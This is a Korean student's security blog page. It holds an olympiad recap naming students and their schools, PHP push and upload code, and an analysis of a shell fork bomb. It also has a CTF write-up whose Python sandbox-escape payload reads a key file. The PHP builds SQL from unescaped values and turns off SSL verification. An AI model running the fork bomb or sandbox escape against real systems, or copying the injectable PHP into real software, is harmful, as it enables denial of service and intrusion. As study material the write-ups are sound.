md5 calculator

2014. 12. 11. 20:19

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

simple login

2014. 12. 11. 20:19

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.



본선이 끝난지 일주일이 거의 다 되가는데 STAC때문에 바빠서 이제서야 후기를 쓰네요.


매년 개최되는 중고생정보보호올림피아드가 올해 9회째를 맞이 하였습니다. 

재작년에는 보안공부를 시작하면서 디미고 선배이신 고길선배깨서 대회를 우승하시고 다 같이 찍으신 사진을 보고 부러워만하고 작년에는 재학증명서 발급을 못받아 참여를 못하였는데 올해는 참여를 하게됬네요.

예선과 본선을 나눠서 진행하였는데 예선은 중학교 11개교와 고등학교 60개에서 총 200여명이 참가해 상위 20명이 본선을 가는 방식이였습니다.



1. Quals


대회는 bob때문에 센터에서 하게 되었습니다. 9시에 공식적인 대회 일정이 시작했는데 늦잠을 자버려 문제는 대충 10시부터 풀기 시작한거 같네요. 총 10개의 문제가 주어졌는데 카테고리 별로 분야가 나뉜게 아닌 다양한 문제들이 자리잡고 있었읍니다. 10번문제는 항상 그래왔듯이 사진이 주어지고 키를 게싱하는 문제였는데 게싱을 극혐 하는 저로써는 도저히 감이 안오더군요. 5번 문제가 c# 리버싱이길래 먼저 문제를 봤더니 클라이언트 프로그램에서 특정 값을 서버로 보내주면 그에 따라 서버에서 특정 응답이 오는 문제였습니다. 적절히 key index값과 key value 값을 맞춰 키를 인증한후 다시 10번 문제를 봤더니 몇일전에 센터에서 몇번 들은 적이 있떤 IoT(사물인터넷)이 답이 더군요. 그래서 얼른 인증을 하고 열심히 문제를 풀려고 삽질을 하다가 대회를 1시간 정도 남기고 웹문제를 하나 풀었습니다. 페이지 마다 js 소스가 있고 그 페이지의 게임들을 클리어하게 해주는 특정 js 함수들을 호출해주면 숨겨진 url  페이지가 나왔습니다. 거기서 post로 주어진 아이디/비번을 인증하니 키가 떠서 인증을 하고 보니 18등이 더군요. ( 본선 진출은 20등까지..) 그렇게 조마조마 하고 있던차에 대회가 끝났습니다.


1. setuid0 ( 임정원 - 선린인터넷고등학교 )

2. push0ebp ( 이시훈 - 선린인터넷고등학교 )

3. KH2RS ( 김승현 - 세일고등학교 )

4. gurwodla ( 임재혁 - 청량고등학교 )

5. simpac ( 심화용 - 선린인터넷고등학교 )

6. codpot ( 서승완 - 한국디지털미디어고등학교 )

7. qqqq ( 이선엽 - 부평고등학교 )

8. 1tchy ( 박선주 - 선린인터넷고등학교 )

9. unlimit ( 배경준 - 한세사이버보안고등학교 )

10. exploit7002 ( 이동관 - 과천외국어고등학교 )

11. reset ( 김대준 - 고려고등학교 )

12. junoim ( 임준오 - 석우중학교 )

13. sangjun123 ( 송상준 - 서초고등학교 )

14. mango ( 김준기 - 선린인터넷고등학교 )

15. velcoz ( 윤성권 - 김해삼문고등학교 )

16. dolee365 ( 양해찬 - 한국디지털미디어고등학교)

17. adm1nkyj ( 김용진 - 함양제일고등학교 )

18. xeros ( 김제곤 - 한국디지털미디어고등학교 )

19. ksg97031 ( 김성기 - 한세사이버보안고등학교 )

20. emiyamulzomdao ( 손민철 - 한국과학영재학교 ) 


위는 예선 최종 순위입니다. 



2. Finals


본선은 10월 17일 여의도 국회의사당에서 진행되었습니다. 대회운영진분깨서 9시까지 오라고 말씀을 주셨었는데 지하철이 막히고 내려야 할 역을 지나버리고 이런 난리를 치는 바람에 딱 8시 59분에 도착했더라구요ㅋㅋㅋ

도착하니까 다른 형들은 다 와계시더군요. 대회장에서 필요한 셋업등을 마치고 나니 숨실 겨를도 없이 바로 대회가 시작했습니다. 


[대회장 입구]


[대회장 내부]


대회가 시작하자마자 여러 문제들을 훑어 보면서 무엇을 풀지 보다가 arm 바이너리 문제를 잡았습니다. 

문제가 정확히 기억이 안나지만.. 아마 배열에 담겨있는 알파벳들을 코드에 나온 대로만 배열 시켜주면 키가 나왔던걸로 기억하네요. 10번 문제는 역시 사진을 던져주고 답을 맞추는 문제였는데 linux, heartbleed, shellshock, paros, mysql 과 같은 사진들을 주더군요. 도저히 감을 못잡고 있다가 공개소프트웨어 엿나? 로 인증 했더니 됐던것 같네요. 거의 100번 가까이 인증 시도를 했던 기억이.. 그리고 푼게 7번 문제 였는데 좀 실망스러웠던게 OpenStego로 한번 추출해주니 바이너리가 나왔고 ida로 열어주니 그대로 키가 박혀있었습니다. 그렇게 3문제를 풀고 등수를 확인했더니 4등이였고 2분만에 준오랑 민철님깨서 바로 문제를 풀어 5, 6등을 차지하더군요. 준오랑은 40초 차이였다는..ㅋㅋㅋㅋ


1등부터 8등까지 전부 2번 7번 10번을 푼 상태로 대회가 마무리 되었습니다. 마지막에 30분 대회를 연장했는데 추격당할까봐 엄청 긴장했네요. 그렇게 대회를 마무리 했고 운이 좋게 제가 금상을 타게 되었습니다. 



대회가 끝나고 국회의사당을 배경으로 찍었습니다. 사진을 못구해서 구하는데로 업뎃 하겠습니다 ㅠㅠ


그렇게 대회가 끝나고 시상식을 한후에 대준이형, 화용이형, 경준이형, 준기형, 선주형이랑 밥을 먹으러 가려 하다가 대준이형은 중간에 빠지시고 나머지 형들이랑 콘래드 호텔쪽에서 밥을 먹고 해어진다음 준기형이랑 같이 센터에 갔네요. 


그럭저럭 재밌는 대회였고 다음에도 또 참여해서 좋은 성적 거두길 바래야겠네요! 

아래는 최종순위입니다. 


△대상 : 김대준(고려고)

△금상 : 박선주 (선린인터넷고), 김성기(한세사이버보안고), 김제곤(한국디지털미디어고)

△은상 : 임준오(석우중), 손민철(한국과학영재고등학교), 윤성권(김해 삼문고)

△동상 : 이시훈(선린인터넷고), 배경준(한세사이버보안고), 서승완(한국디지털미디어고)


 본선에 참가하신 분들과 운영진 여러분들 모두 수고많으셨습니다.



3. 관련기사 및 뉴스


[사이언스 투데이]

http://science.ytn.co.kr/program/program_view.php?s_mcd=0082&s_hcd=&key=201410201627272214

[보안 뉴스]

www.boannews.com/media/view.asp?idx=43600&kind=0


Posted by xer0s :

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

앱 서버 개발을 하면서 막혔던 부분이 gcm이랑 multipart 이렇게 두개 정도 였는데 정리겸 포스팅 해봅니다.



일단 아래는 push알림을 주는 gcm소스이고, API KEY는 본인이 직접 google에서 키를 발급받으셔야 됩니다.

$msg 인자는 push알림을 줄 json 인자고 $result는 db에서 reg_id를 뽑아 아직 fetch 하지 않은 resource 값입니다.

function gcmSend($msg, $result=NULL)

{

$header = array('Content-Type:application/json', 'Authorization:key=API_KEY');


$arr=array();

$arr['data']=array();

$arr['data']=$msg;

$arr['registration_ids']=array();


$i=0;

while($row=mysql_fetch_array($result))

{

$arr['registration_ids'][$i]=$row['reg_id'];

$ch=curl_init();

curl_setopt($ch,CURLOPT_URL,'http://android.googleapis.com/gcm/send');

curl_setopt($ch,CURLOPT_HTTPHEADER, $header);

curl_setopt($ch,CURLOPT_POST, true);

curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);

curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,false);

curl_setopt($ch,CURLOPT_POSTFIELDS,json_encode($arr));

$response=curl_exec($ch);

$obj=json_decode($response, true);


if($obj['results'][0]['error']=="NotRegistered")

{

$reg_id=$row['reg_id'];

$query="DELETE FROM user where reg_id='".$reg_id."'";

mysql_query($query) or die(mysql_error());

}

}

}



그리고 다음은 multipart인데 클라이언트에서 서버로 이미지를 업로드 할때 쓰이는 방식입니다.

인자 $key는 FILES로 받은 타입이 배열일때 그걸 $key로 분리한거고 $error는... 제가 코딩한 방식 때문에 따로 추가시켜준 인자인데 소스를 보시고 이해하시면 될꺼 같습니다.

 function imageUpload($key=NULL, $error=NULL)

{

if($error == UPLOAD_ERR_OK)

{

$imagetype = exif_imagetype($_FILES['file']['tmp_name'][$key]);

if($imagetype != 2 && $imagetype != 3)

{

$return['msg'] = "Only JPG and PNG";

ReturnResult($return);

}

if($_FILES['file']['size'][$key] > 1024*1024*10)

{

$return['msg'] = "Too big";

ReturnResult($return);

}

$filename = substr(sha1(rand().time()), 0, 20).".jpg";

while(1)

{

if(file_exists("images/".$filename))

{

$filename = substr(sha1(rand().time()), 0, 20).".jpg";

}

else

break;

}


if(!move_uploaded_file($_FILES['file']['tmp_name'][$key], "filepath".$filename))

{

$return['msg'] = "Move Uploaded File";

ReturnResult($return);

}

else

{

return $filename;

}

}

else

{

$return['msg'] = "Error while uploading File";

ReturnResult($return);

}

} 



이해를 돕기 위해 imageUpload를 호출한 부분도 올립니다.

foreach($_FILES['file']['error'] as $key => $error)

{

$filename = imageUpload($key, $error);

$query = "INSERT INTO image(imageLoc, isThumbNail, diary_id) VALUES('".$filename."', 0, ".$row[0].")";

mysql_query($query);

} 




'Programming' 카테고리의 다른 글

crc 정리  (0) 2015.04.26
Using Python Z3 theorem solver  (3) 2015.04.25
Python Assembly Emulator  (0) 2014.07.30
DimiManager 개발 후기  (0) 2014.07.11
심심해서 만든거..  (0) 2014.04.11
Posted by xer0s :

shell fork bomb

2014. 10. 8. 20:53 from Security

(){:|:&};:


처음 봤을땐 저게 먼소린지 싶었지만 정리하고 하나하나 분석해보면..


:()

{

:|:&

};

:


인자가 없는 :라는 함수를 선언 시켜 내부에서 recursion과 pipe를 통해 : 함수를 background(&)로 무한히 호출.

테스트 해봤더니 확실히 뻗긴 뻗는다.


'Security' 카테고리의 다른 글

xinetd 환경 설정  (0) 2014.01.31
c++ vtable 리버싱  (0) 2014.01.31
ROP 자료  (1) 2013.11.20
64비트 calling convention + stack frame  (1) 2013.11.15
Native API를 이용한 static 안티 디버깅 정리  (1) 2013.11.10
Posted by xer0s :

문제로 파이썬 소스가 주어집니다. 



builtins 모듈에서 후에 실행시켜줄 raw_input과 print 함수만을 제외하고는 다 지워버립니다.

그리고는 입력을 받고 exec을 통해 실행을 시켜주네요. __bases__ 와 __subclasses__ 모듈을 적절히 이용해 file()함수를 호출하여 키를 읽어 줄 수 있습니다.


root@ubuntu:~# cat key

this works

root@ubuntu:~# python tmp.py

Welcome to my Python sandbox! Enter commands below!

>>> print (().__class__.__bases__[0].__subclasses__()[40]("./key").read())

this works


익스플로잇이 간단해서 좋네요.

로컬에서 성공시키고 서버에서도 성공했었는데 지금은 서버가 닫혔네요ㅜㅜ


'General News > Write-Ups' 카테고리의 다른 글

HackIM nullcon 2015 exploitation100  (0) 2015.01.11
ChristmasCTF ALGO200  (0) 2014.12.26
codegate 2013 vuln200 - exploit only  (0) 2014.02.14
ropasaurusrex  (1) 2013.12.06
codegate junior ctf  (0) 2013.07.27
Posted by xer0s :

2014년 08월 08일날 순천향대 청소년 정보보호 페스티벌 예선전이 열렸었습니다. 이번에 굇수분들이 많이 빠지셔서 운이 좋게도 본선에 진출을 하게 되었네요. 17일날 본선 라운드를 진행하는데 좋은 결과 있었으면 좋겠습니다. 본선 진출자분들과 관계자분들 그때 뵈요! 

대회에 참여했던 사람으로써 간단하게 문제평을 해보자면 매끄럽지 못했던 문제들이 꽤 있었던 것 같습니다. Misc 200 같은 경우는 맥에서 키노트로 열면 키가 바로 보이기도 하였고 web200 같은경우는 출제자분이 의도했던 백터왜에도( 문제힌트로 Blind SQLI라고 나왔습니다) 여러 백터들이 있더군요. indirect sql injection이 그 중 하나였는데 대회 종료후에는 패치가 됐더군요.. system200도 아스키아머 때문에 문제를 풀지 못하는 경우가 있었는데.. 대회도중 no aslr, nx 서버환경등을 알려주더라구요(아는형이 따졌답니다) 제가 보안공부를 시작하고 처음 접했던 대회가 순천향대였던 만큼 아쉬운점들이 몇몇 있었습니다. 


그래도 대회기간동안 밤을 새가면서 대회운영을 해주신 운영진분들 수고하셨습니다.


Writeup 첨부합니다.

xeros_2014_YISF_문제풀이보고서.pdf



Posted by xer0s :

dragon

2014. 8. 12. 21:47

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

ascii_easy

2014. 8. 12. 21:46

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.